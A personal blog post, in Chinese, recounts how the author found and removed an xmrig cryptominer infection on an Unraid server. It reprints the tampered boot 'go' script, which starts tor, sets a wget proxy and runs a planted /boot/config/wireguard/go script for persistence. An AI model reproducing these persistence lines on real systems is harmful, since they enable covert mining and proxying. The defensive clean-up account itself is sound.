记录一次unraid中毒经历（xmrig）

起因 ：一大早发现unraid小主机风扇狂转，CPU一半线程拉满

类似这样，只不过是左边一列所有核

执行top命令，发现xmrig占用 cpu 790+

kill [ID]
find / -name xmrig
rm /bin/xmrig

成功，CPU功耗马上下降，但是几分钟后，CPU负载马上起来，重启也没用

查看定时任务，也没有异常

crontab -l

先将小主机关机，下班再研究

下班回来，继续研究

重启后还能继续运行，查看unraid系统日志

无异常

ps -ef |grep xmrig

root执行，没找到对应日志，

最后决定按文件修改时间来看被修改的项，同时一一修复（蓝框中均为 3:05分，截图时在我删除文件后）

主要清理三项内容 xmrig，snow-flake，tor， 和wireguard文件夹

先清理u盘中config下go文件，去掉wireguard

#!/bin/bash
# Start the Management Utility
tor
/usr/local/sbin/emhttp &
echo "use_proxy=yes" >> /root/.wgetrc
echo "http_proxy=http://127.0.0.1:20171" >> /root/.wgetrc
echo "https_proxy=http://127.0.0.1:20171" >> /root/.wgetrc
echo "wait=10" >> /root/.wgetrc
/bin/bash /boot/config/wireguard/go  ##删除这条

再把ssh中公钥、密钥删除，避免被远程连接，删除wireguard文件夹

find / -name  tor
find / -name  snow-flake
find / -name  xmrig

示例

删除文件及文件夹后重启即可，恢复正常（也许今晚又被拉满，不是）